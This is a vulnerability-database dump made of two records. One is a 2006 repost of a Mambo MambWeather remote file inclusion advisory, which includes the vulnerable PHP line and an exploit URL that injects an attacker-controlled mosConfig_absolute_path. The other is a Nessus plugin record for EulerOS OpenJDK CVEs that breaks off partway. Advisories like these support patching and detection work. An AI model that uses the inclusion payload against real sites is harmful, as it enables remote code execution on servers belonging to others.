{"id": "SECURITYVULNS:DOC:14779", "bulletinFamily": "software", "title": "Another Mambo module remote inclusion vulneribility", "description": "Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew\r\nAnother Mambo module remote inclusion vulneribility\r\n\r\ndownload : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip\r\n \r\nbug found in file : MambWeather/Savant2/Savant2_Plugin_options.php\r\n \r\n <?php\r\n\r\n /**\r\n * Base plugin class.\r\n */\r\n global $mosConfig_absolute_path;\r\n\r\n require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';\r\n\r\n /**\r\n\r\nexploit:\r\n\r\nhttp://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]\r\n\r\nGreetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet\r\n\r\n# milw0rm.com [2006-10-22]\r\n\r\n", "published": "2006-10-23T00:00:00", "modified": "2006-10-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14779", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 7, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-08-31T11:10:19", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB317244", "KB981401", "KB2410679", "KB2785908", "KB2526305", "KB953331", "KB2404575", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:19", "rev": 2}, "vulnersScore": 0.6}, "affectedSoftware": []}

{"nessus": [{"lastseen": "2021-02-25T17:09:31", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2762)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2769)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Security).\n Supported versions that are affected are Java SE:\n 8u212, 11.0.3 and 12.0.1 Java SE Embedded: 8u211.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks require human interaction\n from a person other than the attacker and while the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Java SE, Java\n SE Embedded accessible data.(CVE-2019-2786)\n\n - Vulnerability in the Java SE component of Oracle Java\n SE (subcomponent: JCE). The supported version that is\n affected is Java SE: 8u212. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2842)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2962)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2945)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2964)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u221, 11.0.4\n and 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data and unauthorized ability to cause a\n partial denial of service (partial DOS) of Java SE,\n Java SE Embedded.(CVE-2019-2975)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2978)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2973)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2981)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2983)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Kerberos). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. While the vulnerability is in Java\n SE, Java SE Embedded, attacks may significantly impact\n additional products. Successful attacks of this\n vulnerability can result in unauthorized access to\n critical data or complete access to all Java SE, Java\n SE Embedded accessible data.(CVE-2019-2949)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: 2D). Supported versions that are affected\n are Java SE: 11.0.4 and 13. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2987)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2988)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. While the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access\n to critical data or all Java SE, Java SE Embedded\n accessible data.(CVE-2019-2989)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2992)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Javadoc). Supported versions that are\n affected are Java SE: 7u231, 8u221, 11.0.4 and 13.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks require human interaction from a person other\n than the attacker and while the vulnerability is in\n Java SE, attacks may significantly impact additional\n products. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE accessible data as well as\n unauthorized read access to a subset of Java SE\n accessible data.(CVE-2019-2999)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2583)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-2590)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in takeover of\n Java SE, Java SE Embedded.(CVE-2020-2604)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE.(CVE-2020-2654)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u241 and 8u231\n Java SE Embedded: 8u231. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2659)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-22T00:00:00", "title": "EulerOS 2.0 SP2 : java-1.8.0-openjdk (EulerOS-SA-2021-1310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-2973", "CVE-2019-2992", "CVE-2019-2842", "CVE-2019-2945", "CVE-2020-2830", "CVE-2020-14803", "CVE-2020-14782", "CVE-2019-2762", "CVE-2020-2781", "CVE-2020-2755", "CVE-2020-2800", "CVE-2019-2983", "CVE-2020-2757", "CVE-2019-2999", "CVE-2020-14792", "CVE-2019-2962", "CVE-2019-2964", "CVE-2020-2590", "CVE-2020-14781", "CVE-2019-2949", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-2773", "CVE-2019-2769", "CVE-2020-2659", "CVE-2019-2975", "CVE-2019-2988", "CVE-2020-14796", "CVE-2020-2756", "CVE-2019-2981", "CVE-2019-2786", "CVE-2019-2987", "CVE-2019-2989", "CVE-2019-2978", "CVE-2020-2654", "CVE-2020-2754"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1310.NASL", "href": "https://www.tenable.com/plugins/nessus/146641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146641);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/24\");\n\n script_cve_id(\n \"CVE-2019-2762\",\n \"CVE-2019-2769\",\n \"CVE-2019-2786\",\n \"CVE-2019-2842\",\n \"CVE-2019-2945\",\n \"CVE-2019-2949\",\n \"CVE-2019-2962\",\n \"CVE-2019-2964\",\n \"CVE-2019-2973\",\n \"CVE-2019-2975\",\n \"CVE-2019-2978\",\n \"CVE-2019-2981\",\n \"CVE-2019-2983\",\n \"CVE-2019-2987\",\n \"CVE-2019-2988\",\n \"CVE-2019-2989\",\n \"CVE-2019-2992\",\n \"CVE-2019-2999\",\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14798\",\n \"CVE-2020-14803\",\n \"CVE-2020-2583\",\n \"CVE-2020-2590\",\n \"CVE-2020-2604\",\n \"CVE-2020-2654\",\n \"CVE-2020-2659\",\n \"CVE-2020-2754\",\n \"CVE-2020-2755\",\n \"CVE-2020-2756\",\n \"CVE-2020-2757\",\n \"CVE-2020-2773\",\n \"CVE-2020-2781\",\n \"CVE-2020-2800\",\n \"CVE-2020-2830\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : java-1.8.0-openjdk (EulerOS-SA-2021-1310)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2762)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2769)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Security).\n Supported versions that are affected are Java SE:\n 8u212, 11.0.3 and 12.0.1 Java SE Embedded: 8u211.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks require human interaction\n from a person other than the attacker and while the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Java SE, Java\n SE Embedded accessible data.(CVE-2019-2786)\n\n - Vulnerability in the Java SE component of Oracle Java\n SE (subcomponent: JCE). The supported version that is\n affected is Java SE: 8u212. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2842)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2962)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2945)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2964)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u221, 11.0.4\n and 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data and unauthorized ability to cause a\n partial denial of service (partial DOS) of Java SE,\n Java SE Embedded.(CVE-2019-2975)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2978)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2973)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2981)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2983)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Kerberos). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. While the vulnerability is in Java\n SE, Java SE Embedded, attacks may significantly impact\n additional products. Successful attacks of this\n vulnerability can result in unauthorized access to\n critical data or complete access to all Java SE, Java\n SE Embedded accessible data.(CVE-2019-2949)\n\n - Vulnerability in the Java SE product of Oracle Java 